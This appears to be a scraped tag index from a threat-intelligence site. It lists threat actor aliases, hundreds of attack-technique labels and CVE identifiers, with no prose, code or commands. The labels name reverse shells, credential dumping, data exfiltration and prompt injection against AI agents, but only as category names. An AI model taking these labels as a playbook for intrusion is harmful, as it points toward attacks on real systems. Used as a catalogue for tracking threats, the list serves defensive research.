Actor Aliases All 0ktapus Agenda ak47c2 ak47dns ak47http Akira Anthony Ramirez APT27 APT31 APT43 AresLoader AsyncRAT Beijing Berserk Bear Bitcoin Trader Blacklock Blue Kraken Bossnet Chaos Charming Kitten Chunji Jin Cl0p ClickFix Conti spin-off CowBot Coyote CP3O CP3O LLC Crouching Yeti cryptohan Cyber Av3ngers data thieves DCHsy DDoSia Dragonfly EDRKillShifter El Dorado Eleven Eleven Botnet Elijah Emissary Panda Energetic Bear Extortion Com Facebook Fancy Bear Flax Typhoon Flyservers S.A. Fraudsters FreeVPN.one GFW Global Group government goons Graphite Great Firewall of China Gustavo Fring Hacker Com Haise Haoran Xu Hunters International Immediate Mator In Real Life Com IntelBroker IRL Com IsDLEnabledinAD Jiho Han Jodie Judgment Panda Kaleidoscope KaWaLocker King Bob Koala Team Lalartu LameHug Lampion Larva-208 Latrodectus lkmanka58 LOCKBIT.BLACK Lumma Stealer LunaSpy MedusaLocker MintsLoader Muddled Libra MultiMillionaire LLC Murky Panda MysterySnail MysterySnail RAT Neferpitou NetSupport Nova Octo Tempest Orange Ownraptor Perplexity-User PerplexityBot Pompompurin PRC Qilin ransomware gang Quantum Quantum Bumex Rabotnik Ramp cybercrime forum account RANSOMHUB ransomware gang Rapper Bot RapperBot RealBlindingEDR REDBIKE Redline/Meta Stealer Redmond remi Royal Russian Federal Security Service’s (FSB) Center 16 unit Russian hackers Salt Typhoon Scatter Swine Scattered Spider ScatteredLapsuSp1d3rHunters SectopRAT ShinyHunters Silk Typhoon Sim Hyon-sop Slaykings Soco404 Sosa SoundBill SparkCat Spider Team Static Tundra Storm-0978 Storm-2603 The Community thesecure.biz operator Tropical Scorpius Typhoon UNC2596 UNC3886 UNC3944 Universal Mining UNKN Volt Typhoon VSOCIETY World Leaks XORacle Xworm Yemen Cyber Army Zephyr Zirconium
Exploit Method All .ICS-based calendar phishing 0-day 5G to 4G Downgrade Attack Abuse of Android Permissions for Data Exfiltration and Control Abuse of gpscript.exe Abuse of HRSword Abuse of Legitimate RMM Tools for Persistence Abuse of poorly managed local accounts and privilege paths Abuse of SSH Access for Ransomware Deployment Access to Compromised Systems Accidental Data Deletion via Third-Party Access Accidental Data Exposure via Search Engine Indexing Account Compromise via Stolen Credentials Account Hijacking and Persistence Account Hijacking via Telegram Premium Gift Scam Account Takeover Active Directory Group Manipulation Admin Panel Access and Data Exfiltration Administrator Account Hijacking via Password Reset ADP Region Bypass Adversarial Actions or Vulnerabilities in Electronic Voting Machines Adversarial Example Attacks Adversarial Reward Hacking Advertising and Recruitment Agent Memory Poisoning Agentic AI in Windows Settings AI Agent Credential Exposure AI Agent Privileged Data Access AI Agent Vulnerability AI ClickFix AI Crawler Overload AI Generated Content Misuse AI Girlfriend Data Theft AI Hallucination AI Image Watermark Removal AI Powered Workout Buddy Data Usage AI Voice Scam AI-Augmented Mutational Fuzzing AI-based Age Detection for Data Collection AI-driven Price Gouging/Surveillance Pricing AI-Driven Risks AI-Fueled Data Exfiltration via Automated Agents AI-Powered Phishing Attacks AI-Powered Real-time Threat Detection Circumvented by Adding Cyber Later AI-Powered Vulnerability Generation Airtel Router Default Password Exploitation Alert Fatigue Leading to Ineffective Security Operations Allianz Life Customer Info Breach Allianz Life Data Breach and Deprecated API Exploitation and Registry/Disk Search ANSI Escape Code Injection ANSI Terminal Escape Code Injection Apache Tomcat Compromise via Weak Credentials Apple ID Scam Leading to Theft Application Layer (L7) DDoS Attacks Arbitrary Code Execution via Prompt Injection with 'find -exec' Arbitrary Command Execution via Allowlisted Commands Arbitrary Command Execution via Malicious MCP Server Addition Arbitrary File Write via Hard Link and Symlink Arbitrary Firmware Flashing via Web Portal Arbitrary Free via Forged Session AresLoader Malware-as-a-Service AresLoader Malware-as-a-Service (MaaS) Authenticated Remote Code Execution via SharePoint Automated CVE-2018-0171 Exploitation Automated Dependency Updates Automatic Tool Invocation AV-killer malware abusing ThrottleStop.sys AVideo_Race_Condition_and_Blacklist_Chain AWS Managed Active Directory RBCD Attack via Default Permissions AWS Trusted Advisor Flaw Backdoor Backdoor Access via Broken Encryption Backdoor Creation Backdoored Devices (General) Backup Sabotage BadBazaar Beta Software Bugs Beta Software Instability Beyond Compare Clipboard Injection Bitdefender Box V1 Unauthenticated Firmware Downgrade and Command Injection BlackCat Ransomware Bluetooth Connectivity Bomb Threats & Swatting Broken Authentication/Authorization via Exposed API Documentation Broken Authentication/Authorization via Public API Documentation Broken Windows Reset/Recovery Brushing Scam Brushing Scam leading to data exfiltration/malware installation BSOD via Easy Anti-Cheat incompatibility Buffer Overflow Business Email Compromise (BEC) Business Logic Abuse (BOLA) BYOVD (Bring Your Own Vulnerable Driver) Bypassing Validation Checks with Brute Forcing Bypassing_Windows_Hello_Fingerprint_Login C# Random Number Generator Integer Underflow C# Random Number Generator Predictability C4 (Chrome Cookie Cipher Cracker) Cable-cutting techniques (anchor dragging) Car Unlocking Exploit Card Testing ChatGPT Agent Website Login Exploit Check Kiting/Tap-In Scam Child Sextortion and Exploitation Chinese Supply Chain Intrusions Circumventing Antitrust Regulations Cisco Bug Exploitation Cisco ISE Vulnerability Exploitation Citrix Vulnerability Exploitation Claude Desktop Arbitrary Command Execution via Email Cleartext Authentication Exploit ClickFix ClickFix Social Engineering ClickFix Technique Clickjacking Client-side blind in/on-path attacks for connection inference Client-Side Posture Check Bypass via Binary Patching Clipboard Address Replacement Clipboard Address Swapping via Malware (Efimer) CLOUD Act Data Access Cloud Resource Abuse for Cryptojacking Cloud Trusted-Relationship Compromise CM/ECF Cyberattack Cobalt_Strike_Post_Exploitation COM Hijacking via Registry Key Command Injection Chain Command Injection in SynologyPhotos Command Injection via Improper Sanitization Command Line Obfuscation Company Secrets Submitted to AI Compromise of Aeroflot's IT Systems Compromise of cloud environment via phished admin credentials Compromised AUR Packages Containing Remote Access Trojan (RAT) Compromised Certificate Usage Compromised CI/CD Pipelines Compromised Dahua Surveillance Cameras Compromised Delegated Administrative Privileges (DAP) Compromised Employee Accounts Compromised Infrastructure Exploitation Compromised npm Packages via Malicious Code Injection Compromised Passwords Compromised Ring Camera Accounts Compromised SaaS Application Registration Secret Compromised Software Supply Chain Compromised Steam Game Distribution of Malware Compromised Third-Party Applications Compromised VS Code Extension Compromising Smartphones for User Data Configuration File Manipulation for Unauthorized Access Configuration File Modification for Unauthorized Access Connect IQ API Vulnerabilities Connectivity to various streaming platforms and voice assistants ConnectWise Server Vulnerability Context Poisoning (Echo Chamber technique) Coordination Copilot Agent Prompt Injection via GitHub Issues Copilot Vision Data Transmission COROS Smartwatch Vulnerabilities CORS Bypass via Simple Request Manipulation CosMc's Promotional Coupon Exploit Crafted Network Packet DoS Crafted Protocol Buffer Message DoS Credential Abuse Credential Decryption via Incorrect Registry Permissions and Hardcoded Key Credential Extraction via Mimikatz Credential Harvesting & Data Theft Credential Phishing via Impersonation Credential Phishing via Lookalike Domains Credential Resetting via Net.exe Credential Sprawl Leading to Breaches Credential Stealing via PowerShell and Keylogging Credential Stuffing Credential Stuffing via Bots Credential Stuffing/Compromise Credential Stuffing/Reused Credentials Credential Stuffing/Reused Login Attack Credential Theft via Mimikatz Credential Theft via Multiple Vulnerabilities Credential_Theft_via_Mimikatz Cross-Server Manipulation (Confused Deputy) Cryptocurrency Mining Centers (Illicit) Cryptocurrency Mining Exploitation Cryptocurrency Scam Recovery Fraud Cryptocurrency Theft Cryptocurrency Wallet Seed Phrase Phishing CVE-2025-57789 and CVE-2025-57790 CWE Exploitation Cyber Privateers Cyberattacks on critical systems impacting US military operations Cycle Exploitation Danabot DarkLnk Data Access via Government Request (Cloud Act) Data Access via Investment Data Breach Data Breach of 200GB Data Breach of Order Management System Data Breach Through Mishandled User Data Data Breach via Unidentified Database Access Data Breach/Leak Data Broker Non-Compliance with CCPA Data Broker Surveillance Bypass Data Collection and Potential Misuse Data Collection for Targeted Advertising via Browser Ownership Data Collection of Underage YouTube Users Data Corruption/SSD Failure Data Deletion Data Deletion and Privilege Escalation Attempts Data Exfiltration Data Exfiltration and Auction Data Exfiltration and System Downtime Data Exfiltration followed by Extortion Data Exfiltration from iiNet Order Creation and Tracking System Data Exfiltration from Naval Group's IT Systems Data Exfiltration via `read_url_content` Tool Data Exfiltration via AzCopy and WinSCP Data Exfiltration via Browsing Tool Data Exfiltration via GoodSync Data Exfiltration via Image Rendering Data Exfiltration via Markdown Image Rendering Data Exfiltration via Mermaid Diagrams Data Exfiltration via Portable Storage Devices Data Exfiltration via Underwater Devices Data Exposure due to Misconfiguration Data Exposure via Unauthenticated API Access Data Harvesting Data Leakage Data Poisoning Data Poisoning via Training Data Data Scraping for AI Training Data Set Manipulation via Face Morphing Data Sharing with Third Parties Data Siloing Data Sovereignty and Potential Breaches Data Theft leading to Phishing/Fraud Data Theft via Canadian House of Commons Breach Data Transfer Commands for Exfiltration Data transfer under CLOUD Act Data Wiping Code Injection Data_Leaks_Through_Server_Side_Logging DataExfiltration DDoS Attack DDoS Botnet leveraging compromised IoT devices Decoy Domain Detection Deepfake Social Engineering Deepfake-Based BEC Deepfake-Enabled Social Engineering for Investment Fraud Delayed Patch Availability for Perpetual License Holders Dell Customer Solution Centers Product Demonstration Platform Cyber Attack Demographic Bias in Facial Recognition Deserialization of Untrusted Input leading to Arbitrary Code Execution Deserialization to RCE via Forged Delegate Destination Hijacking and Storage Limit Oracle Side-Channel Attack Developer Mode Side-Loading Risk Developer Mode Side-Loading Vulnerability Directory Access Bypass via Improper Path Validation Disabling_Microsoft_Defender_via_Registry_Modification Discord Invite Link Hijacking Disk-Swap Attack Distributed Denial-of-Service (DDoS) DLL Hijacking DLL Search Order Hijacking DNS Data Exfiltration via Prompt Injection DNS Hijacking DNS PTR Record Hijacking DNS Spoofing/Manipulation (Censorship) DNS Tunneling Double Extortion Downgrade Attack Doxing Doxing and Harassment of Election Officials Doxing and Stalking DripDropper Malware Deployment Drive-by Download via AI Manipulation Drive-by-Download Eavesdropping and Recording of Conversations Echo Chamber with Narrative Steering ECScape: ECS Task Credential Theft via ECS Agent Impersonation EDR Killer Tool EDRKillShifter and Vulnerable Driver Exploitation (BYOVD) Elasticsearch Instance Reconnaissance EMF_Out_of_Bounds_Read Emotional Dependency Entra ID Privilege Escalation via Service Principal Takeover Entra OAuth Misconfiguration for Internal Microsoft Application Access Equation Editor Exploit ERMAC_v3_Source_Code_Leak Erosion of Cybersecurity Expertise at the State Department ESXi Ransomware via SSH Evasive Trade Patterns and Shell Companies Execute PE From PNG Via LNK Execution of Arbitrary Commands and Code via WMI Tooling Exfiltrating Stored User Memories via Prompt Injection Exploitation of Interconnected IT and OT Systems Exploitation of known vulnerabilities for initial access Exploitation of Known Vulnerabilities in CISA KEV Exploitation of seemingly innocuous information leak Exploitation of Unmanaged Devices in Ransomware Attacks Exploitation of Weak Pass-Through Obligations Exploiting Known Vulnerabilities for Initial Access Exploiting known vulnerabilities on unpatched servers Exploiting Outdated Software Exposed High Voltage Components Exposed_Infrastructure_Abuse Face Morphing Identity Fraud Facebook Likejacking via Trojan.JS.Likejack Facial Recognition Misidentification due to Low Image Quality Fake Accounts Fake Cryptocurrency Investments Fake Tesla Website Credit Card Theft FakeCaptcha Faulty Driver Causing System Crashes Faulty OAuth Implementation in Staff Portals Feel-Good Design Hub Account Creation Exploit Fickle Stealer UAC Bypass find -exec Arbitrary Command Execution Follina MSDT PowerShell execution Fortinet SSL VPN Brute-Force Fourth-Party Data Breach via Supply Chain Fraudulent IT Worker Schemes Fraudulent Remote IT Work Free Food Exploit Front-Running Fuzzing for Memory Errors GDI+ Metafile Attack (CVE-2025-53766) GitHub Authentication Token Theft Global Restaurant Standards Portal Admin Authorization Exploit Google Forms Phishing GoPhish_Phishing Grok Conversation Exposure via Search Engines GUI Port Scanning and Configuration Hijacking Gzip Reverse Shell Hacking Back Hacking Tool Distribution Hard-coded Shadowsocks password leading to traffic decryption Harmful content Heap Corruption/Use-After-Free via Arbitrary Free Heap_Corruption_via_Forged_Session_Object Hidden Command Execution via CAPTCHA Hijacked/Acquired Legitimate Extensions HMRC Impersonation and Phishing for Identity Theft Honeypot Data Theft Hotel Booking System Infiltration and Data Theft HTTP Chunked Encoding Stack Overflow HTTP Chunked Transfer Encoding Memory Corruption in NVIDIA Triton HTTP Host Header Authentication Bypass HTTP Request Smuggling via Chunk Extension Parsing HTTP Request Smuggling via HTTP/1.1 Desync HTTP/2 Rapid Reset Hyper-V Certificate Spoofing (CVE-2025-49707) Hyper-V VM Escape (CVE-2025-48807) Identity Fraud & Misrepresentation for Remote Work Identity Verification Friction as an Obfuscation Tactic Image Scaling Attack for Multi-Modal Prompt Injection Image Scaling Attack Leading to Indirect Prompt Injection Image-Based Device Hijacking Impersonation of US-Based Remote Workers Impersonation-as-a-Service In-Memory Execution of Shell Scripts and C Code Increased Foreign Surveillance Indirect Prompt Injection leading to Data Exfiltration via Shell Tool Indirect Prompt Injection Leading to Port Exposure Indirect Prompt Injection leading to Remote Code Execution Information Hoarding Infostealer Malware Inheritance Scam Inheritance Scams Initial Intrusion Insecure Cross-Site Worklet Code Leaking Shared Storage Data Insecure Deserialization for Command Execution Insecure_C2_Infrastructure Insecure-by-Design Notification System Insider Sabotage via Code Modification Insider Threat Exploitation Insider Threats Instagram Phishing Campaign Integer Overflow in FTS5 Extension Interlock Ransomware Attack Internet-Facing Appliance Exploitation Invisible Unicode Tag Character Prompt Injection Invisible Unicode Tag Prompt Injection Invisible_Prompt_Injection_via_Unicode_Tag_Characters Iranian spyware DCHsy Jenkins Git Parameter Plugin Command Injection JPEG Image Attack (CVE-2025-50165) JPEG Image Processing Attack JSCEAL Juice Jacking JuicyPotato Privilege Escalation JupyterLab Misconfiguration Leading to Command Execution Kaleidoscope Ad Fraud Campaign Kaseya Supply Chain Attack Kawa4096 Ransomware Arbitrary Command Execution Kawa4096 Ransomware Data Deletion Kerberoasting Kill Switch via Active Directory Account Disablement L1TF Reloaded Lack of AI Usage Policies and Training Lack of Cybersecurity Skills and Knowledge Lack of Multi-Factor Authentication (MFA) Lack of Recovery and Continuity Testing LameHug Laptop Farm Lateral Movement and Privilege Escalation Lateral Movement to Other Dealer Systems Lateral Movement via RDP using SoftEther VPN client Lateral_Movement_via_PsExec_and_Impacket Layer 7 HTTP Flood Lazarus APT Watering Hole Attack LD_PRELOAD Rootkit for Hiding Processes and Files Leaky Debugging Reports Bypassing Referrer-Policy and CSP Legacy Systems and Delayed Cloud Migration Legal Uncertainty Leading to Reduced Threat Information Sharing Legitimate File-Sharing Software for Data Exfiltration Lethal Trifecta Exploitation Leveraging Unencrypted vMotion for Credential Theft LFI Librarian Ghouls APT RAR and BAT script attack Line Jumping/Prompt Injection via Tool Descriptions Linux Namespace Abuse for Network Isolation/Sinkholing Living-off-the-land binaries (LOLBins) attack LLM Data Theft via Malicious Prompts Location Data Aggregation and Sale Location Tracking by Untrusted Contacts Login Bypass and Privilege Escalation Loyalty Points Fraud Lumma Stealer LummaC2 Infostealer LummaStealer LZ1 vulnerability M365 Copilot File Access Without Audit Logs M365 Copilot Jailbreak via Caret Characters MachineKey Theft via spinstall0.aspx MadeYouReset MagicBell API Key Exposure Mailchimp Phishing for Subscriber Data Theft Mains Voltage Leakage Malicious Ads Injection (Malvertising) Malicious Apps Slipping Through Play Store Security Malicious Archive Exploitation Malicious Browser Extension as Spyware Malicious Browser Extensions Malicious Exploitation of AI-Generated Code Malicious Image Processing for Memory Corruption Malicious Java Thread Exhaustion Malicious Java Thread Loop Malicious NPM Package Injection Malicious OAuth App Connection Malicious OAuth Application Infiltration Malicious Package Persistence Malicious PowerShell Script with Base64 Encoding Malicious Pull Request and Credential Acquisition Malicious Tool Injection Malicious USB Drives (Hardware Wallet Seed Phrase Theft) MALICIOUS_API_REQUEST_FOR_PRIVILEGE_ESCALATION MALICIOUS_FILE_UPLOAD_TO_PRIVILEGED_DIRECTORY Malvertising campaign Malware Distribution Malware Hiding in /dev/shm Man-in-the-Middle Attack on Public Wi-Fi Man-in-the-Middle Phishing for MFA Tokens Manual Extraction of Findings into Other Tools Manual Package Dependency Manipulation Markdown Image Rendering Data Exfiltration Marshal Deserialization Exploit in Rails Controller MAS Hijacking Mass Internet Scanning MCPoison Memory or Credential Dumping Meta AI Conversation Exposure Metasploit_Exploitation Method Tampering MFA Bombing MFA Fatigue Attack Microsoft SharePoint 'ToolShell' vulnerability exploit chain Microsoft SharePoint Attack using Dual Vulnerabilities Microsoft SharePoint on-prem attacks Microsoft SharePoint Vulnerability Exploit Midnight Blizzard Corporate System Infiltration Mimikatz credential extraction Mirai-based DDoS Botnet Misconfigurations Misconfigured Security Tools MiVoice MX-ONE Authentication Bypass Money Muling Money Muling via Social Media Mount-based Download and Execute MOVEit Transfer mass exploitation by Clop ransomware MSMQ Packet Attack (CVE-2025-50177) Multi-Stage HTTP Payload Fragmentation NDI Streaming Performance Degradation Netgear bashsledding exploit Netgear bigfish_littlepond exploit Netgear WGR614v9 UPnP Authentication Bypass Network Configuration Misconfiguration leading to Initial Unreachability Network Layer (L3/4) DDoS Attacks NodeSnake Remote Access Trojan Nomani Trojan Campaign NPM Package Infostealer NULL_Pointer_Dereference_in_elastic-endpoint-driver.sys NVIDIA Triton Unauthenticated Takeover Obfuscation of Cryptocurrency Transactions OCI Image Archive Bomb Office Preview Pane RCE Offline VMDK Disk Swap OGNL Injection Olivia AI Chatbot Default Password Exploit Online Scams Online Scams (Investment Fraud) Open Directory Listing Out-of-bounds Read in EMF Processing Out-of-bounds Write via Crafted ControlVault API Call Overreliance on Vendors and Frameworks OVERSTEP Backdoor Deployment OVERSTEP Rootkit Deployment Packet Injection Parameter Manipulation for Data Extraction Parsing Untrusted Files Passkey Inconsistent Recognition Password Brute-Force/Credential Stuffing Password Reset via Net.exe Path Traversal Payload Installation on Activation Penetration Testing PerfektBlue Bluetooth Attack Persistence Techniques Persistence_via_spinstall0.aspx_Web_Shell_and_IIS_Manipulation Phishing Phishing and Online Dating Scams Phishing and Social Engineering Phishing and Social Engineering using Generative AI Phishing Attack via Unfiltered Links Phishing Campaign Targeting UK Home Office SMS Phishing Campaign via AI-Generated Fake Login Pages Phishing Campaigns Phishing Email Attachment Phishing for npm Account Credentials Phishing Kit Sales and Tutoring Phishing Link Click Phishing via compromised email accounts Phishing via Mailto Links Phishing via Netflix Impersonation Phishing via SMS (Smishing) Phishing via Telegraph Tool Phishing via Typosquatting and Mailto Links Phishing Website Blocking Phishing-as-a-Service via Telegram Bots Physical Access Bypass of Windows Login Physical Access to Voting Machines Physical Attacks Physical Tampering/Theft Leading to Data Access Polyglot File Exploit - Panda Images Hiding Malicious Payloads Poorly Configured Cloud Services Poorly Configured Server Post-Compromise Persistence via Firmware Implant Post-Exploitation Patching Post-Mortem Security Approach Post-Patch Impersonation PostgreSQL Remote Code Execution Potential Admin Panel Access PowerCLI command execution without in-guest credentials PowerSchool Credential Interception PowerShell 2.0 Dependency PowerShell Event Log Deletion PowerShell Invoke-Expression (IEX) abuse Powershell Script Execution from Non-Standard Directory Prison visitor details shared with all inmates at correctional facility Privacy Issues Private Messaging for Cybercriminals Privilege Escalation Attempt Privilege Escalation using JuicyPotato Privilege Escalation via JuicyPotato Privilege Escalation via Unmanaged Local Accounts Privileged Access Abuse Prompt Injection Prompt Injection for Data Harvesting Prompt Injection in Google Gemini for Workspace Prompt Injection Leading to Data Exfiltration via Image Rendering Prompt Injection leading to Data Theft Prompt Injection leading to DNS Exfiltration Prompt Injection leading to RCE via Settings Modification Prompt Injection leading to Remote Code Execution Prompt Injection Leading to Remote Code Execution Prompt Injection Leading to Remote Command & Control Prompt Injection via Image Rendering for Data Exfiltration Prompt Injection via url_safe bypass Prompt Injection/Egress Control Vulnerability in AI-Assisted Training Tools PromptFix Proprietary Wireless Charging Protocols PsExec & Impacket lateral movement QR Code Phishing QR Code Phishing/Malware Distribution QR Code Scams Quantum Computer Encryption Breaking QUIC-LEAK Pre-Handshake Memory Exhaustion Quishing (QR Phishing) RADIUS Authentication Command Injection (CVE-2025-20265) RAM Disk Buffer Overflow via HTTP PUT Request RansomHub Ransomware Ransomware Ransomware and Data Exfiltration Ransomware attack Ransomware Attack Ransomware Attack (Qilin) Ransomware Attack on Payment Processing Systems Ransomware Attack with LockBit and Babuk Variants Ransomware Deployment and Extortion Ransomware Deployment via SharePoint Vulnerability Ransomware Deployment via SonicWall Firewall Exploitation Ransomware Enabled by Cryptocurrency Exchange Ransomware Extortion of Downstream Customers Ransomware Targeting Git Repositories via Exposed Credentials Ransomware_Deployment_via_GPO Ransomware-as-a-Service (RaaS) Ransomware-as-a-Service (RaaS) Facilitation RansomwareAttack Rapper Bot DDoS Attack Rapper Bot DDoS Botnet RAR Archive & BAT Script Delivery (Librarian Ghouls) RCE via Crafted Metafile in GDI+ RCE via Malicious JPEG in Office Document RDP Exposure RDP Lateral Movement RealBlindingEDR Customization and Abuse Recall Screenshotting of Brave Browser Recycled Information/Previously Compromised Data (PCD) Red Teaming Evasion (prompt injection) Redline/Meta Stealer Reentrancy Attack Reflected XSS in AVideo 14.4 Reflected XSS in radiationDoseReport.php Reflected XSS in userLogin.php cancelUri parameter Reflected_XSS_in_PlaylistOwnerUsersId Registry Key Modification to Disable EDR Registry Run Key Persistence Reliance on Non-EU Software/Services Remediation Failure Loop Remote Access Attacks Remote Code Execution Through Chained CVEs Remote Code Execution via Prompt Injection and Chained Commands Remote Code Execution via SSH Command Injection Remote Kill Switch Retbleed ReVault Exploit Reverse Social Engineering RFQ Net Financing Scam RMM Tool Abuse for Persistence RobbinHood Ransomware Robots.txt Bypass via User-Agent Spoofing and IP Rotation robots.txt directive bypass Rogue Rogue Admin Account Creation Romance Scams and Business Email Compromises (BEC) Rootkit Detection RustyClaw Downloader Execution SaaS Account Compromise via VPS Sale of User Data Salt Typhoon Salt Typhoon Hack SarangTrap Malware Campaign Scam E-commerce Purchase Scams and Fraud via WhatsApp Screenshot Exfiltration Self-XSS via Disk Cache Server-Side Request Forgery (SSRF) in cecho.php Service_Infrastructure_Degradation Session Hijacking Sextortion SHA-1 Collision Attack Shadow SharePoint .NET Deserialization via ToolPane.aspx SharePoint Authentication Bypass and Remote Code Execution Chain SharePoint Hack SharePoint Remote Code Execution Chain (Auth Bypass + Insecure Deserialization) SharePoint Vulnerability Exploitation SharePoint Zero-Day Attack Spree SharePoint Zero-Day Exploits (July 2023) SharePoint_Exploitation_for_Ransomware Shell on a system with command execution ShinyHunters Salesforce Attack Sideloading of Extensions Silent Tool Redefinition SIM Swapping SimpleHelp Zero-Day RCE Sleepwalk Sliver_Post_Exploitation Smart Install Exploitation (CVE-2018-0171) Smart Install Message Crafted Attack SMS Bombing SMS Phishing SMS_Scams_via_Sentiment_and_Requests SMS_Scams_via_URL_Shorteners Snapshot-based AD Database Exfiltration Sniffing Attack SnipBot Variant Execution with Registry Check SNMP Exploitation in End-of-Life Devices Social Engineering Social Engineering and Redirection to Malicious Domains Social Engineering for Initial Access Social Engineering leading to Account Takeover and Data Theft Social Engineering leading to Credential Reset Social Engineering of Salesforce Users via Malicious OAuth Apps Social Engineering Password Reset Social Engineering Scams Social Engineering Scams via Direct Messages (DMs) Social Engineering via AI Mimicry Social Engineering via AI Phishing Social Engineering via Hyperlinks and Invisible Unicode Characters Social Engineering via Impersonation of IT Support Social Engineering via IT Help Desk Social Engineering via Messenger for Malware Distribution Social Engineering via Service Desk Social Engineering via SMS Phishing and In-Person Collection Social Engineering via Voice Phishing Social Engineering/Misinformation Campaign Social Engineering/Voice Phishing (Vishing) Social Media Phishing via Deepfakes and Impersonation Social Media Scams SoftEther_Proxy Spearphishing with LNK file and PowerShell to deliver XenoRAT Speculative ROP SQL Injection SQL Injection via Unauthenticated API Endpoint SQLi SSH Exposure sshd Configuration Modification for Root Login SSL VPN MFA Bypass/Credential Theft ssp_dump_lsass Stack_Overflow_in_securebio_identify State-Exhaustion Attacks Stealing Developer Secrets via Prompt Injection and Grep Steam Games Malware Delivery Steam Platform as Malware Distribution Channel Stolen Account Credentials Stolen Credentials leading to Data Breach Stolen Data Marketplace Stolen Identity for Employment Storm-0558 Cloud Email Breach Stuxnet Subscription Traps Supply Chain Attack Supply Chain Attack (SolarWinds) Supply Chain Attack via Compromised npm Package Supply Chain Attacks Supply Chain Compromise Supply Chain Compromises Supply Chain Fraud (Phishing) Supply Chain Infiltration/Trade Secret Theft/Sabotage Supply Chain Malware Injection via npm Package Compromise SVG Image with Embedded Javascript Execution Swatting Swatting-for-hire Swatting-for-Hire/Coercion SYNful Knock SYNful Knock Firmware Implant System Wipe Exploit SYSTEM_Privilege_Escalation_via_Firmware_Modification TarFile.extractall()/extract() filter bypass via hard link manipulation TCP RST+ACK Packet Injection Tea Dating App Private Message Disclosure Telecom Infrastructure Compromise via Widespread Vulnerabilities Thermal Throttling and Overheating Third-party risk oversight Third-Party Service Access via Connectors Third-Party Vendor Exploitation Threatening Communication Timed Clickjacking Exploit Tizen OS Vulnerabilities tj-actions/changed-files Supply Chain Breach Token Theft Tool Poisoning via Hidden Instructions in Tool Descriptions ToolShell ToolShell Exploit Chain ToolShell Exploit Chain (SharePoint Servers) ToolShell zero-day exploit chain Trade-Based Money Laundering Transient execution vulnerability Trojan Downloader Trusted Advisor Bypass via Policy Manipulation Tunneling Webshell Deployment on F5 Load Balancers Tuya App Notification Exploit Typhoon crews Typosquatting/Tool Impersonation UART Access for Debugging and Shell Access UI Automation (UIA) Abuse for Credential Theft Unauthenticated RCE via CVE-2025-57788 Unauthenticated RCE via CVE-2025-57791 and CVE-2025-57790 Unauthenticated Remote Code Execution as Root Unauthenticated Remote Code Execution via Metadata Uploader Endpoint Unauthenticated Remote Command Injection Unauthenticated Server-Side Template Injection Unauthorized Data Access Unauthorized Malicious Activity Unauthorized Network Access Unimplemented Incident Reporting Uninitialized function pointer call in JPEG decoding Uninitialized Pointer Memory Corruption via Malicious PDF Unintentional Data Exposure Through Shared Chats Universal RCE Deserialization Gadget Chain UnMarker Watermark Removal Unoptimized Code Flow Causing Connection Error Unreliable Network Share Backup Unsecured Firebase Storage Bucket Unsecured Public Wi-Fi Untrusted Deserialization Untrustworthy LLM Output URL Anchor Hijacking Usability Issues Leading to Frustration and Potential Security Risks USB-based Malware Distribution Use of customized shellcode loader SoundBill Use of Legitimate Remote Monitoring and Management (RMM) Software VBScript obfuscation in Javascript VCSA GRUB Bootloader Manipulation view_text_website Tool Data Exfiltration VIN-Based Account Takeover and Remote Vehicle Control Violence and Fraud via Telegram Violence-as-a-Service (VaaS) VIPKeylogger VM Guest to Host Escape Volt Typhoon Espionage Vulnerability Scanning for Exploitation WannaCry SMBv1 EternalBlue Watering Hole Attack (Lazarus APT) Weakening Encryption Web Application & API Protection (WAAP) Attacks Web Application Attacks Web Defacement Web Desync Attacks Web Interface Directory Traversal Web Shell Deployment via Crafted POST Requests Webshell Deployment Webshell Implant Webshell implantation on SharePoint servers Website Defacement WhoFi_Wi-Fi_Re-Identification Windows 10 End-of-Life Migration Windows Administrator Password Cracking Windows Recall Screenshotting of Sensitive Data Windows Update Failure from Network Share WinRAR ADS Path Traversal WinRAR Path Traversal Exploit via Malicious Archives WinRAR vulnerability exploitation WordPress Website Compromise WSUS Update Failure XSS XZ-Utils Backdoor YaST Misconfiguration YouTube Impersonation for Channel Takeover YubiKey Cloning Zelle Fraud Due to Insufficient Security Measures Zero-Click Image Processing Zero-Day Exploitation Zero-Day Vulnerability Exploitation ZombAI Zombie
Vulnerabilities All CVD-2024-0096 CVE-2017-11882 CVE-2018-0171 CVE-2018-20835 CVE-2019-5420 CVE-2021-20035 CVE-2021-20038 CVE-2021-20039 CVE-2021-36260 CVE-2022-1388 CVE-2023-34048 CVE-2023-3519 CVE-2023-36884 CVE-2023-46604 CVE-2023-48788 CVE-2024-12905 CVE-2024-13973 CVE-2024-13974 CVE-2024-2088 CVE-2024-23692 CVE-2024-3094 CVE-2024-37085 CVE-2024-38196 CVE-2024-38475 CVE-2024-40766 CVE-2024-41713 CVE-2024-45431 CVE-2024-45432 CVE-2024-45433 CVE-2024-45434 CVE-2024-47575 CVE-2024-49039 CVE-2024-50623 CVE-2024-55550 CVE-2024-55956 CVE-2024-9680 CVE-2025-053 CVE-2025-0589 CVE-2025-20265 CVE-2025-20281 CVE-2025-20282 CVE-2025-20337 CVE-2025-21479 CVE-2025-23310 CVE-2025-23311 CVE-2025-24000 CVE-2025-24311 CVE-2025-24485 CVE-2025-24919 CVE-2025-24922 CVE-2025-25050 CVE-2025-25214 CVE-2025-25215 CVE-2025-25256 CVE-2025-26469 CVE-2025-27724 CVE-2025-30388 CVE-2025-31324 CVE-2025-32731 CVE-2025-32819 CVE-2025-32820 CVE-2025-32821 CVE-2025-35966 CVE-2025-36512 CVE-2025-36520 CVE-2025-36548 CVE-2025-3928 CVE-2025-40596 CVE-2025-40597 CVE-2025-40598 CVE-2025-40599 CVE-2025-41420 CVE-2025-42999 CVE-2025-43300 CVE-2025-46354 CVE-2025-46410 CVE-2025-47227 CVE-2025-47228 CVE-2025-47984 CVE-2025-48498 CVE-2025-48530 CVE-2025-48732 CVE-2025-48807 CVE-2025-49704 CVE-2025-49706 CVE-2025-49707 CVE-2025-49712 CVE-2025-49743 CVE-2025-50128 CVE-2025-50165 CVE-2025-50167 CVE-2025-50168 CVE-2025-50171 CVE-2025-50176 CVE-2025-50177 CVE-2025-52914 CVE-2025-53084 CVE-2025-53109 CVE-2025-53132 CVE-2025-53147 CVE-2025-53156 CVE-2025-53399 CVE-2025-53652 CVE-2025-53731 CVE-2025-53733 CVE-2025-53740 CVE-2025-53766 CVE-2025-53767 CVE-2025-53770 CVE-2025-53771 CVE-2025-53773 CVE-2025-53774 CVE-2025-53778 